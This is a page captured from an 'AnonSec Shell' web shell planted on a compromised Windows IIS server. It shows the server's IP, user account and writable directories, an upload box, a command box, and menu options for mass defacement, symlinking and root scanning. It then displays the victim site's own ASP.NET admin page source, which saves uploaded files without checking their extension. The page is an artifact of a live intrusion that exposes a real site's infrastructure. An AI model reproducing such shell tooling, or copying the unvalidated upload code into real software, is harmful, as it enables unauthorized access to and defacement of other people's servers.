AnonSec Shell
Server IP : 199.79.62.161  /  Your IP : 216.73.216.245   [ Reverse IP ]
Web Server : Microsoft-IIS/10.0
System : Windows NT MDUS-PP-WB12 10.0 build 20348 (Windows Server 2022) AMD64
User : IWPD_5096(nirmaowd) ( 0)
PHP Version : 8.3.30
Disable Function : NONE
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  D:/INETPUB/VHOSTS/nirmalamatha.edu.in/ponnuguruvayurappan.org/Admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : D:/INETPUB/VHOSTS/nirmalamatha.edu.in/ponnuguruvayurappan.org/Admin/AddNewsEvents.aspx.cs
using System;
using System.Data;
using System.Data.SqlClient;
using System.Configuration;
using System.Collections;
using System.Web;
using System.Web.Security;
using System.Web.UI;
using System.Web.UI.WebControls;
using System.Web.UI.WebControls.WebParts;
using System.Web.UI.HtmlControls;

public partial class admin_addplots : System.Web.UI.Page
{
    protected void Page_Load(object sender, EventArgs e)
    {
        if (Convert.ToString(Session["snmadmin"]) != "verified") Response.Redirect("Default.aspx?msg=Please Login");
    }
    protected void Button1_Click(object sender, EventArgs e)
    {
        if (picture4.FileName == "$")
           Response.Redirect("message.aspx?msg=Please select Picture");
       else if (txtdisplay.Text == "")
            Response.Redirect("message.aspx?msg=Please enter Display Order");

        else
        {
            try
            {
                int i = Convert.ToInt32(txtdisplay.Text);
            }
            catch
            {
                Response.Redirect("message.aspx?msg=Please enter Display Order in Number");
            }

            if (WriteToDB(txtheading.Text, links.Text, int.Parse(txtdisplay.Text), txtdetails.Text) > 0)
            {
                Response.Redirect("message.aspx?msg=Successfully Added");
            }
            else
            {
                Response.Redirect("message.aspx?msg=Server Busy Try Later");
            }
        }
    }
    private int WriteToDB(string heading, string links, int dispalyorder, string details)
    {

        int autoid = 0;
        string path = Server.MapPath("db");

        // Create connection RISNETINConnectionString
        SqlConnection dbConn = new SqlConnection(ConfigurationManager.ConnectionStrings["Webconfig"].ConnectionString);
        // Create Adapter

        SqlDataAdapter dbAdapt = new SqlDataAdapter("SELECT  TOP 1 * FROM Plots ORDER BY NewsID DESC", dbConn);

        // We need this to get an ID back from the database
        dbAdapt.MissingSchemaAction = MissingSchemaAction.AddWithKey;

        // Create and initialize CommandBuilder
        SqlCommandBuilder dbCB = new SqlCommandBuilder(dbAdapt);
        // Open Connection
        dbConn.Open();

        // New DataSet
        DataSet dbSet = new DataSet();

        // Populate DataSet with data
        dbAdapt.Fill(dbSet, "temp");

        // Get reference to our table
        DataTable dbTable = dbSet.Tables["temp"];

        // Create new row
        string oldid = "";
        if (dbTable.Rows.Count > 0)
        {
            oldid = dbTable.Rows[0]["NewsID"].ToString();
        }
        DataRow dbRow = dbTable.NewRow();

        // Store data in the row
        string filename = "";

        //if (fu_File.HasFile)
        

        dbRow["Heading"] = heading;
        if (filename != "")
            dbRow["Downloads"] = filename;
        else
            dbRow["Downloads"] = "";
        dbRow["Description"] = details;
        dbRow["DisplayOrder"] = dispalyorder;
        dbRow["Links"] = links;
        dbRow["AddedDate"] = DateTime.Now.ToString();
        dbRow["Status"] = true;

        int stat = 0;
        // Add row back to table
        // Update data source
        // Get newFileID
        //try
        //{
        if (!dbRow.IsNull("NewsID"))
            autoid = (int)dbRow["NewsID"];
        if (autoid > 0)
        {
            //Label1.Text = "Item Added";
            //(, , , , , , , , Photo3, Photo4, , )
            string smallpicname = "";
            try
            {
                if (picture4.HasFile)
                    smallpicname = SaveFile(autoid.ToString() + "PIC1", picture4.PostedFile);
                else
                    smallpicname = "";
                dbRow["Picture"] = smallpicname;

            }
            catch (Exception) { }

            dbTable.Rows.Add(dbRow);

            stat = dbAdapt.Update(dbSet, "temp");
            dbConn.Close();
            return stat;

        }
        else
        {
            //if (oldid == "") oldid = "RISPR0";
            //int newid = (int.Parse(oldid.Substring(5)) + 1);
            string smallpicname = "";
            try
            {
                if (picture4.HasFile)
                    smallpicname = SaveFile(1 + "PIC1", picture4.PostedFile);
                else
                    smallpicname = "";
                dbRow["Picture"] = smallpicname;

            }
            catch (Exception) { }
            dbTable.Rows.Add(dbRow);
            stat = dbAdapt.Update(dbSet, "temp");
            dbConn.Close();
            return stat;
        }
    }
    public string SaveFile(string id, HttpPostedFile myFile)
    {

        string fn = id;
        fn += System.IO.Path.GetExtension(myFile.FileName);
        string SaveLocation = Server.MapPath("Plots_files") + "\\" + fn;
        myFile.SaveAs(SaveLocation);

        return fn;
    }
    public string SaveFile1(string id, HttpPostedFile myFile, string SavePath)
    {
        string fn = id;
        fn += System.IO.Path.GetExtension(myFile.FileName);
        string SaveLocation = Server.MapPath(SavePath) + "\\" + fn;
        myFile.SaveAs(SaveLocation);
        return fn;
    }
}

Anon7 - 2022
AnonSec Team